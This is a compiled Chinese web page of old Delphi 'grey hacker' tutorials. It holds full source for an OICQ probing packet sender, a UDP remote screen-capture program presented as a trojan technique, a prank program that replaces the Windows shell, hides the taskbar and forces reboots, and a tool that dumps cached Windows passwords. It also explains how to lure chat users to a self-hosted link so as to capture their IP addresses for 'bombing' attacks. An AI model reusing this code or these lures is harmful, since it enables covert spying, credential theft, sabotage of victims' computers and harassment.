|
|
|
| |
|
追捕的OICQ探测技术
冯志宏
实际上目前所有的OICQ探测方法都一样,发送一个OICQ消息给对方,凭借OICQ 的返回信息来判断对方的OICQ号码,具体的DELPHI实现如下: NMUDP1是ICS控件包的UDP控件。
NMUDP1.ReportLevel := Status_Basic;
NMUDP1.RemoteHost := edit1.Text;
NMUDP1.RemotePort := 4000;
UdpTmpStr :=#$02 +#$03 +#$0a +#$00 +#$78 +#13 +#$A
+ ‘88888‘ +#$1f +#$30 +#$1f + #$33 + #$39 +#$1f
+FormatDateTime(‘yyyy-mm-dd‘,now)
+#$1f
+FormatDateTime(‘hh:mm:ss‘,now)
+#$1f
+ ‘你正在被某位朋友查询。他使用了追捕这个工具软件( http://www.zhuibu.com/)进行探测,此OICQ号码已经被反馈给对方。‘
+ ‘信息所提示的OICQ号码为虚假号码,但可以即时回复。‘ + #$03;
if OicqCheck.Checked then begin
for SendUdpNum:=1 to 10 do begin
MyStream := TMemoryStream.Create;
try
MyStream.Write(UdpTmpStr[1], Length(UdpTmpStr));
NMUDP1.SendStream(MyStream);
finally
MyStream.Free;
end;
end;
end;
待续..
远程屏幕抓取,写一个木马程序必备的技巧
Thursday,Oct-26
檀革勤 [互联网]
木马的一个很重要的功能就是远程监视屏幕,下面的文章讲述了怎样利用UDP协议来实现,而不是我们通常用到的tcp/ip协议,很有特色,值得一学。
一、软硬件要求。
Windows95/98对等网,用来监视的计算机(以下简称主控机)和被监视的计算机(以下简称受控机)都必须装有TCP/IP
协议,并正确配置。如没有网络,也可以在一台计算机上进行调试。
二、实现方法。
编制两个应用程序,一个为VClient.exe,装在受控机上,另一个为VServer.exe,装在主控机上。VServer.exe指定要监视的受控机的IP地址和将要在受控机屏幕上抓取区域的大小和位置,并发出屏幕抓取指令给VClient.exe,VClient.exe得到指令后,在受控机屏幕上选取指定区域,生成数据流,将其发回主控机,并在主控机上显示出抓取区域的BMP图象。由以上过程可以看出,该方法的关键有二:一是如何在受控机上进行屏幕抓取,二是如何通过TCP/IP协议在两台计算机中传输数据。
UDP(User Datagram
Protocol,意为用户报文协议)是Internet上广泛采用的通信协议之一。与TCP协议不同,它是一种非连接的传输协议,没有确认机制,可靠性不如TCP,但它的效率却比TCP高,用于远程屏幕监视还是比较适合的。同时,UDP控件不区分服务器端和客户端,只区分发送端和接收端,编程上较为简单,故选用UDP协议,使用Delphi
4.0提供的TNMUDP控件。
三、创建演示程序。
第一步,编制VClient.exe文件。新建Delphi工程,将默认窗体的Name属性设为“Client”。加入TNMUDP控件,Name属性设为“CUDP”;LocalPort属性设为“1111”,让控件CUDP监视受控机的1111端口,当有数据发送到该口时,触发控件CUDP的OnDataReceived事件;RemotePort属性设为“2222”,当控件CUDP发送数据时,将数据发到主控机的2222口。
在implementation后面加入变量定义
const BufSize=2048;{ 发送每一笔数据的缓冲区大小 }
var
BmpStream:TMemoryStream;
LeftSize:Longint;{ 发送每一笔数据后剩余的字节数 }
为Client的OnCreate事件添加代码:
procedure TClient.FormCreate(Sender: TObject);
begin
BmpStream:=TMemoryStream.Create;
end;
为Client的OnDestroy事件添加代码:
procedure TClient.FormDestroy(Sender: TObject);
begin
BmpStream.Free;
end;
为控件CUDP的OnDataReceived事件添加代码:
procedure TClient.CUDPDataReceived(Sender: TComponent;
NumberBytes: Integer; FromIP: String);
var
CtrlCode:array[0..29] of char;
Buf:array[0..BufSize-1] of char;
TmpStr:string;
SendSize,LeftPos,TopPos,RightPos,BottomPos:integer;
begin
CUDP.ReadBuffer(CtrlCode,NumberBytes);{ 读取控制码 }
if CtrlCode[0]+CtrlCode[1]+CtrlCode[2]+CtrlCode[3]=‘show‘ then
begin { 控制码前4位为“show”表示主控机发出了抓屏指令 }
if BmpStream.Size=0 then { 没有数据可发,必须截屏生成数据 }
begin
TmpStr:=StrPas(CtrlCode);
TmpStr:=Copy(TmpStr,5,Length(TmpStr)-4);
LeftPos:=StrToInt(Copy(TmpStr,1,Pos(‘:‘,TmpStr)-1));
TmpStr:=Copy(TmpStr,Pos(‘:‘,TmpStr)+1,Length(TmpStr)
-Pos(‘:‘,TmpStr));
TopPos:=StrToInt(Copy(TmpStr,1,Pos(‘:‘,TmpStr)-1));
TmpStr:=Copy(TmpStr,Pos(‘:‘,TmpStr)+1,Length(TmpStr)-
Pos(‘:‘,TmpStr));
RightPos:=StrToInt(Copy(TmpStr,1,Pos(‘:‘,TmpStr)-1));
BottomPos:=StrToInt(Copy(TmpStr,Pos(‘:‘,TmpStr
)+1,Length(TmpStr)-Pos(‘:‘,TmpStr)));
ScreenCap(LeftPos,TopPos,RightPos,BottomPos); {
截取屏幕 }
end;
if LeftSize>BufSize then SendSize:=BufSize
else SendSize:=LeftSize;
BmpStream.ReadBuffer(Buf,SendSize);
LeftSize:=LeftSize-SendSize;
if LeftSize=0 then BmpStream.Clear;{ 清空流 }
CUDP.RemoteHost:=FromIP; { FromIP为主控机IP地址 }
CUDP.SendBuffer(Buf,SendSize); { 将数据发到主控机的2222口 }
end;
end;
其中ScreenCap是自定义函数,截取屏幕指定区域,
代码如下:
procedure TClient.ScreenCap(LeftPos,TopPos,
RightPos,BottomPos:integer);
var
RectWidth,RectHeight:integer;
SourceDC,DestDC,Bhandle:integer;
Bitmap:TBitmap;
begin
RectWidth:=RightPos-LeftPos;
RectHeight:=BottomPos-TopPos;
SourceDC:=CreateDC(‘DISPLAY‘,‘‘,‘‘,nil);
DestDC:=CreateCompatibleDC(SourceDC);
Bhandle:=CreateCompatibleBitmap(SourceDC,
RectWidth,RectHeight);
SelectObject(DestDC,Bhandle);
BitBlt(DestDC,0,0,RectWidth,RectHeight,SourceDC,
LeftPos,TopPos,SRCCOPY);
Bitmap:=TBitmap.Create;
Bitmap.Handle:=BHandle;
BitMap.SaveToStream(BmpStream);
BmpStream.Position:=0;
LeftSize:=BmpStream.Size;
Bitmap.Free;
DeleteDC(DestDC);
ReleaseDC(Bhandle,SourceDC);
end;
存为“C:\\VClient\\ClnUnit.pas”和“C:\\VClient\\VClient.dpr”,
并编译。
第二步,编制VServer.exe文件。新建Delphi工程,将窗体的Name属性设为“Server”。加入TNMUDP控件,Name属性设为“SUDP”;LocalPort属性设为“2222”,让控件SUDP监视主控机的2222端口,当有数据发送到该口时,触发控件SUDP的OnDataReceived事件;RemotePort属性设为“1111”,当控件SUDP发送数据时,将数据发到受控机的1111口。加入控件Image1,Align属性设为“alClient”;加入控件Button1,Caption属性设为“截屏”;加入控件Label1,Caption属性设为“左:上:右:下”;加入控件Edit1,Text属性设为“0:0:100:100”;加入控件Label2,Caption属性设为“受控机IP地址”;加入控件Edit2,Text属性设为“127.0.0.1”;
在implementation后面加入变量定义
const BufSize=2048;
var
RsltStream,TmpStream:TMemoryStream;
为Server的OnCreate事件添加代码:
procedure TServer.FormCreate(Sender: TObject);
begin
RsltStream:=TMemoryStream.Create;
TmpStream:=TMemoryStream.Create;
end;
为Client的OnDestroy事件添加代码:
procedure TServer.FormDestroy(Sender: TObject);
begin
RsltStream.Free;
TmpStream.Free;
end;
为控件Button1的onClick事件添加代码:
procedure TServer.Button1Click(Sender: TObject);
var ReqCode:array[0..29] of char;ReqCodeStr:string;
begin
ReqCodeStr:=‘show‘+Edit1.Text;
StrpCopy(ReqCode,ReqCodeStr);
TmpStream.Clear;
RsltStream.Clear;
SUDP.RemoteHost:=Edit2.Text;
SUDP.SendBuffer(ReqCode,30);
end;
为控件SUDP的OnDataReceived事件添加代码:
procedure TServer.SUDPDataReceived(Sender: TComponent;
NumberBytes: Integer; FromIP: String);
var ReqCode:array[0..29] of char;ReqCodeStr:string;
begin
ReqCodeStr:=‘show‘+Edit1.text;
StrpCopy(ReqCode,ReqCodeStr);
SUDP.ReadStream(TmpStream);
RsltStream.CopyFrom(TmpStream,NumberBytes);
if NumberBytes< BufSize then { 数据已读完 }
begin
RsltStream.Position:=0;
Image1.Picture.Bitmap.LoadFromStream(RsltStream);
TmpStream.Clear;
RsltStream.Clear;
end
else
begin
TmpStream.Clear;
ReqCode:=‘show‘;
SUDP.RemoteHost:=Edit2.Text;
SUDP.SendBuffer(ReqCode,30);
end;
end;
存为“C:\\VServer\\SvrUnit.pas”和
“C:\\VServer\\VServer.dpr”,并编译。
---- 四、测试。
1、本地机测试:在本地机同时运行Vserver.exe和VClient.exe,利用程序的默认设置,即可实现截屏。查看“控制面板”-“网络”-“TCP/IP”-“IP地址”,将程序的“客户IP地址”设为该地址
,同样正常运行。
2、远程测试:选一台受控机,运行VClient.exe;另选一台主控机,运行VServer.exe,将“受控机IP地址”即Edit2的内容设为受控机的IP地址,“截屏”即可。以上简要介绍了远程屏幕抓取的实现方法,至于在主控机上一屏同时监视多个受控机,读者可自行完善。以上程序,在Windows98对等网、Delphi
4.0下调试通过
利用外壳的妖之吻
Thursday,Oct-26
千年老妖 [Delphi编程技巧]
我一直很困惑,为什么一个简单而且粗糙的程序居然流行开了,记得那是好几个月前,和老孔雀无聊地聊天,实在找不到什么兴趣之后,突然想捉弄他一下,就一边聊一边做程序,很简单的几行代码几分钟就搞定,用一个Tinifiles搞定了windows的shell的外壳,一个关机命令,一个热键屏蔽命令,一个timer来倒数延时,一个难看的窗体,组装好了就发过去,就一直不见对方踪影了,晚上看到傲气的小鹰在QQ上,就怀着搞笑的心理发给了他,于是就从傲气开始了下载,这个无聊的软件对一些懂得windows的人来说不构成危害,但是对一些刚刚接触电脑的人,很可能造成对方重新安装系统甚至去格式化硬盘,对此深表歉意。忘记了做成重启动N次后自动恢复。但这个程序本身对数据不造成危害。windows和dos一样,有个shell外壳,启动的时候加载它,就是我们看到的界面,是必须的,和windows的启动运行不一样,是前提,所以很多朋友中了妖之吻之后,拼命改注册表,win.ini,都不行。而且不能删除它,一旦删除,win98就会蓝屏报错,提示请重新安装。:-)
下面是程序的实现,这些代码与最初的代码有许多地方不一样,还没有完成。因为后来心血来潮想增加点东东,后来放弃了,毕竟还是无聊的东西。
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Classes,inifiles, Graphics, Controls,
Forms, Dialogs,
StdCtrls, ExtCtrls, Buttons;
type
TForm1 = class(TForm)
Timer1: TTimer;
Label1: TLabel;
Timer2: TTimer;
Label2: TLabel;
SpeedButton1: TSpeedButton;
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
procedure Timer2Timer(Sender: TObject);
procedure SpeedButton1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.DFM}
var
sysini:tinifile;//定一个ini,准备动手术
j,i:integer;
procedure TForm1.Timer1Timer(Sender: TObject);
begin
exitwindowsex(ewx_reboot,0);//倒数时间到,关机罗!
end;
procedure TForm1.FormCreate(Sender: TObject);
var
hregion,wndHandle : THandle;
wndClass : array[0..50] of Char;
k:string;
begin
hregion:=createellipticrgn(14,200,350,14);//想画个不规则窗体
setwindowrgn(handle,hregion,true);
StrPCopy(@wndClass[0], ‘Shell_TrayWnd‘);
wndHandle := FindWindow(@wndClass[0], nil);
ShowWindow(wndHandle, SW_HIDE);
i:=60;
SetWindowLong(Application.Handle,GWL_EXSTYLE,WS_EX_TOOLWINDOW);
systemparametersinfo(97,1,nil,0);//屏蔽热键
timer1.Enabled:=false;
sysini:=Tinifile.Create(‘system.ini‘);
k:=sysini.ReadString(‘boot‘,‘shell‘,k);//这里准备做成启动20次恢复,
if (k=‘explorer‘) or (k=‘explorer.exe‘) then
begin
sysini.WriteInteger(‘mci‘,‘mcicount‘,20);
sysini.WriteString(‘boot‘,‘shell‘,application.ExeName);//这里用自己替换掉了shell
end
end;
procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
systemparametersinfo(97,0,nil,0);//取消屏蔽
end;
procedure TForm1.Timer2Timer(Sender: TObject);
begin
i:=i-1;
label2.Caption:=inttostr(i);
if i=1 then
begin
timer2.Enabled:=false;
timer1.Enabled:=true;
j:=sysini.ReadInteger(‘mci‘,‘mcicount‘,j);
j:=j-1;
if j=1 then
begin
sysini.WriteString(‘boot‘,‘shell‘,‘explorer.exe‘);//当启动满了20次,恢复shell
end;
end;
end;
procedure TForm1.SpeedButton1Click(Sender: TObject);//调试用的
begin
timer1.Enabled:=false;
timer2.Enabled:=false;
application.Terminate;
systemparametersinfo(97,1,nil,0);
end;
end.
还存在个问题,这个程序里面的代码没有屏蔽掉Alt+F4,可以更换成别的办法。
10月23日
写一个类PwView密码查看的程序
Thursday,Oct-26
不详 [网络收集]
很多朋友用过pwview以及类似的软件吧?一运行windows的密码全找到了,这里给一个原代码,不是老妖写的,是网上搜罗的,里面的代码值得一学,为写自己的hacker软件积累点点滴滴..
unit Unit1;
interface
uses
Windows, SysUtils, Classes, Forms, ShellAPI, Controls, StdCtrls;
type
TForm1 = class(TForm)
GroupBox1: TGroupBox;
ListBox: TListBox;
Label1: TLabel;
Label2: TLabel;
procedure Label1Click(Sender: TObject);
procedure FormShow(Sender: TObject);
private
{ Private declarations }
public
hMPR: THandle;
end;
var
Form1: TForm1;
const
Count: Integer = 0;
function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte; PC: PChar;
dw: DWord): Word; stdcall;
implementation
{$R *.DFM}
function WNetEnumCachedPasswords(lp: lpStr; w: Word; b: Byte; PC: PChar;
dw: DWord): Word; external mpr name ‘WNetEnumCachedPasswords‘;
type
PWinPassword = ^TWinPassword;
TWinPassword = record
EntrySize: Word;
ResourceSize: Word;
PasswordSize: Word;
EntryIndex: Byte;
EntryType: Byte;
PasswordC: Char;
end;
var
WinPassword: TWinPassword;
function AddPassword(WinPassword: PWinPassword; dw: DWord): LongBool;
stdcall;
var
Password: String;
PC: Array[0..$FF] of Char;
begin
inc(Count);
Move(WinPassword.PasswordC, PC, WinPassword.ResourceSize);
PC[WinPassword.ResourceSize] := #0;
CharToOem(PC, PC);
Password := StrPas(PC);
Move(WinPassword.PasswordC, PC, WinPassword.PasswordSize +
WinPassword.ResourceSize);
Move(PC[WinPassword.ResourceSize], PC, WinPassword.PasswordSize);
PC[WinPassword.PasswordSize] := #0;
CharToOem(PC, PC);
Password := Password + ‘: ‘ + StrPas(PC);
Form1.ListBox.Items.Add(Password);
Result := True;
end;
procedure TForm1.Label1Click(Sender: TObject);
begin
ShellExecute(GetDesktopWindow, ‘open‘, ‘http://wlhyy.126.com‘, nil, nil,
0);
end;
procedure TForm1.FormShow(Sender: TObject);
begin
if WNetEnumCachedPasswords(nil, 0, $FF, @AddPassword, 0) <> 0 then
begin
Application.MessageBox(‘Can‘‘t load passwords: User is not logon.‘,
‘Error‘, mb_Ok or mb_IconWarning);
Application.Terminate;
end
else
if Count = 0 then
ListBox.Items.Add(‘No passwords found...‘);
end;
end.
大家来当灰客 (二)乱弹IP查询
Thursday,Oct-26
千年老妖 [网络天地]
这个网络上最不缺的就是灰客,灰客们的话题永远停留在怎么怎么查找IP上面,为什么了?因为有了IP,顿时天空都明朗了,IGMP炸弹..追捕..ICQ炸弹..木马十八般武艺顿时有了用武之地。灰客们咬来嚼去的所谓之技术,其中所谓之查IP的技术,根本谈不上是什么技术,其实很简单,就这么几个花样...这里慢慢拿出来晒晒太阳..
至于古老的从dos下面netstrat这里就不谈了,因为早有人做成了windows版本的。就目前最简单最容易上手的方法和原理浅谈一二,当然,如果你是在电信数据局工作,这个就免看了,去服务器就搞定...
一个无聊的灰客最喜欢做什么?这个还用说,炸人呗,极端无聊的灰客喜欢做什么?找一段IP挨个炸,一个简单的扫描器就行了,看看那些IP能ping通,稍微有点目标的话,用用追捕的月光搜索,它的原理是利用netbios挨个扫描出一个网段上每个活动IP的计算机名,非常好用,我和几个朋友在网络上自建三角州服务器玩三角,他们怎么找到我的IP呢?就用这个,也不用我挨个通知了,我的计算机名是wlhsoft,他们一扫描就知道了,很实用吧?用来快速准确查找一个长期养马的机器也特别方便。
当一个豪气万丈的灰客在聊天的时候,在泡MM的时候遇到了对手怎么办?当然是一击必杀了,如果是在oicq上面就方便多了,此类炸弹软件多如牛毛,oicq是基于UDP协议的聊天工具,协议的特性注定了安全性远远跟不上基于TCP/IP协议的工具,oicq的每条信息都包含了你的IP地址,只需要把数据报截获下来分析就知道了,做到程序里面就成了灰客们常用的oicqIP查询的工具,详细做法另文再谈。这是利用软件的缺陷查IP。无需灰客动脑,一切搞定。
如果是在聊天室里面怎么办?一个web聊天室如果在里面没有权限,看不到IP是很痛苦的,如果这个聊天室支持html,就好办了,我在delphi编程里面的贴介绍了怎么做一个IP猎人,就用它,用你自己制作的软件来抓IP,原理不用多说了,看看那篇贴子就很明白了。只要你和对方的机器有个直接的访问就可以了,用html代码让对方的浏览器直接访问自己的机器,默认80端口,发一个图或者一个音乐,(img
src=http://你本机IP/xx.jpg)即可,这种方法很古老的,很多聊天室已经不能使用html了,但是又怎么难得到技术高超的灰客呢?嘿嘿,变通一下,用花言巧语吧,欺骗对方来访问你的IP,‘我找到一个好网站哦!!!‘此类的话很容易吧?为了更像一点,干脆去免费申请一个
yahoo.126.com的域名直接指向你的IP,嘿嘿,当然对方连接你,他的浏览器会看到‘web地址已经找到’,但是无论如何也打不开了。这种方法是万金油,到处都可以抹,只要你能言善骗,一脸无可挑剔的真诚,警惕性再高的人都会被你抓住.还有几种小方法,比如利用访问日志,聊天室的bug把message.cgi打开了之类的,觉得没多大意思,就上面的几个小办法足以满足一个灰客的日常需要了。下次聊
怎样用delphi制作一个IPhunter(独孤剑客的IP猎人)
Thursday,Oct-26
千年老妖 [delphi编程技巧]
很多朋友用过独孤剑客写的IPhunter吧,它是利用在聊天室发图片的原理查找对方IP,其实不仅仅是聊天室,只要有人对你的机器存在访问,就能够抓到他的IP,甚至主机名,在老妖的软件猎鹿人当中也利用了这个原理,在delphi中是很容易实现的,现在我们用delphi来做一个和IPhunter一模一样的软件。
有人说现在的程序员成了组装工人,其实很有道理,利用控件模块+少量代码就可以实现,delphi
5.0提供了丰富的internet控件,利用TCP/IP
客户端-服务端就可以解决问题。关键的控件是ServerSocket,我们模仿IPhunter的界面用一个button1(按钮),一个combobox1(用于显示),这三个最基本的控件放置到空白窗体上就可以开始写代码了
。
首先,这个combobox1必须能显示多个IP,我们定一个变量y来累加combobox1.items[y],
var y:integer;
我们的思路如下,当ServerSocket活动的port(端口)收到基于TCP/IP协议的连结请求时候,返回对方的IP值,传递给combobox显示出来。由button1控制ServerSocket的激活,也就是打开关闭端口。
我们在ServerSocket的On ClientConnect事件中加入一下代码
procedure TForm1.ServerSocket11ClientConnect(Sender: TObject;
Socket: TCustomWinSocket);
begin
combobox1.Items.Insert(y,‘‘);//加入一条空纪录
combobox1.Items[y]:=socket.RemoteAddress;//获取对方的IP
label1.Text:=‘共捕获‘+inttostr(y+1)+‘个IP‘;//用一个标签来显示一共抓了多少IP
y:=y+1;//计数变量加1
socket.Close;
end;
现在,将button1的caption属性设置为 ‘开始‘,在它的单击事件中加入以下代码
procedure TForm1.SpeedButton7Click(Sender: TObject);
begin
if speedbutton7.Caption=‘开始‘ then
begin
serversocket11.Port:=80;//这句可以在serversocket属性中设定,捕获浏览器的连接
ServerSocket11.Active:=true;//激活端口
speedbutton7.Caption:=‘停止‘;
end
else
begin
serversocket11.Active:=false;//关闭端口
speedbutton7.Caption:=‘开始‘;
combobox1.Clear;//结束捕获,清空历史信息
y:=0;//计数变量复位
end;
end;
现在一个IPhunter基本就可以使用了,这只是很简单原型,加上您自己精心制作的界面,就是一个网络灰客工具了,这个功能也集成到了猎鹿人里面,这里说到的只是ServerSocket最基本的一点功能而已,加上ClientSocket就可以做一个聊天工具,只用ClientSocket可以做一个和代理猎手一样的扫描软件. |
|
| |
|
|
|
